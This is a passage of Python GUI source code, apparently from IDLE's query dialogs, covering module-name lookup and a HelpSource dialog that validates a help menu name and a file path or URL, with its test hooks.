name = self.entry.get().strip()
if not name:
self.showerror('no name specified.')
return None
# XXX Ought to insert current file's directory in front of path.
try:
spec = importlib.util.find_spec(name)
except (ValueError, ImportError) as msg:
self.showerror(str(msg))
return None
if spec is None:
self.showerror("module not found")
return None
if not isinstance(spec.loader, importlib.abc.SourceLoader):
self.showerror("not a source-based module")
return None
try:
file_path = spec.loader.get_filename(name)
except AttributeError:
self.showerror("loader does not support get_filename",
parent=self)
return None
return file_path
class HelpSource(Query):
"Get menu name and help source for Help menu."
# Used in ConfigDialog.HelpListItemAdd/Edit, (941/9)
def __init__(self, parent, title, *, menuitem='', filepath='',
used_names={}, _htest=False, _utest=False):
"""Get menu entry and url/local file for Additional Help.
User enters a name for the Help resource and a web url or file
name. The user can browse for the file.
"""
self.filepath = filepath
message = 'Name for item on Help menu:'
super().__init__(
parent, title, message, text0=menuitem,
used_names=used_names, _htest=_htest, _utest=_utest)
def create_widgets(self):
super().create_widgets()
frame = self.frame
pathlabel = Label(frame, anchor='w', justify='left',
text='Help File Path: Enter URL or browse for file')
self.pathvar = StringVar(self, self.filepath)
self.path = Entry(frame, textvariable=self.pathvar, width=40)
browse = Button(frame, text='Browse', width=8,
command=self.browse_file)
self.path_error = Label(frame, text=' ', foreground='red',
font=self.error_font)
pathlabel.grid(column=0, row=10, columnspan=3, padx=5, pady=[10,0],
sticky=W)
self.path.grid(column=0, row=11, columnspan=2, padx=5, sticky=W+E,
pady=[10,0])
browse.grid(column=2, row=11, padx=5, sticky=W+S)
self.path_error.grid(column=0, row=12, columnspan=3, padx=5,
sticky=W+E)
def askfilename(self, filetypes, initdir, initfile): # htest #
# Extracted from browse_file so can mock for unittests.
# Cannot unittest as cannot simulate button clicks.
# Test by running htest, such as by running this file.
return filedialog.Open(parent=self, filetypes=filetypes)\
.show(initialdir=initdir, initialfile=initfile)
def browse_file(self):
filetypes = [
("HTML Files", "*.htm *.html", "TEXT"),
("PDF Files", "*.pdf", "TEXT"),
("Windows Help Files", "*.chm"),
("Text Files", "*.txt", "TEXT"),
("All Files", "*")]
path = self.pathvar.get()
if path:
dir, base = os.path.split(path)
else:
base = None
if platform[:3] == 'win':
dir = os.path.join(os.path.dirname(executable), 'Doc')
if not os.path.isdir(dir):
dir = os.getcwd()
else:
dir = os.getcwd()
file = self.askfilename(filetypes, dir, base)
if file:
self.pathvar.set(file)
item_ok = SectionName.entry_ok # localize for test override
def path_ok(self):
"Simple validity check for menu file path"
path = self.path.get().strip()
if not path: #no path specified
self.showerror('no help file path specified.', self.path_error)
return None
elif not path.startswith(('www.', 'http')):
if path[:5] == 'file:':
path = path[5:]
if not os.path.exists(path):
self.showerror('help file path does not exist.',
self.path_error)
return None
if platform == 'darwin': # for Mac Safari
path = "file://" + path
return path
def entry_ok(self):
"Return apparently valid (name, path) or None"
self.entry_error['text'] = ''
self.path_error['text'] = ''
name = self.item_ok()
path = self.path_ok()
return None if name is None or path is None else (name, path)
if __name__ == '__main__':
import unittest
unittest.main('idlelib.idle_test.test_query', verbosity=2, exit=False)
from idlelib.idle_test.htest import run
run(Query, HelpSource)
| apache-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.